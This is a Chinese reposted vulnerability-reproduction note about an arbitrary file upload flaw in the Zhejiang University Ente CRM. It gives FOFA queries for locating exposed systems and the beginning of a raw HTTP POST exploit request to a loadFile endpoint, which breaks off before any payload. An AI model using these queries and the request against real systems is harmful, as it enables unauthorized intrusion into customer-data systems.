当前位置:首页 > 编程笔记 > 正文
已解决

【漏洞复现】浙大恩特CRM文件上传0day

来自网友在路上 11128112提问 提问时间:2023-11-19 23:23:07阅读次数: 112

最佳答案 问答题库1128位专家为你答疑解惑

漏洞描述

浙大恩特客户资源管理系统任意文件上传漏洞
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa 
title="欢迎使用浙大恩特客户资源管理系统"
app="浙大恩特客户资源管理系统"

漏洞复现


POST /entsoft/CustomerAction.entphone;.js?method=loadFile HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0  uacq
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Acc
查看全文

99%的人还看了

猜你感兴趣

版权申明

本文"【漏洞复现】浙大恩特CRM文件上传0day":http://eshow365.cn/6-39744-0.html 内容来自互联网,请自行判断内容的正确性。如有侵权请联系我们,立即删除!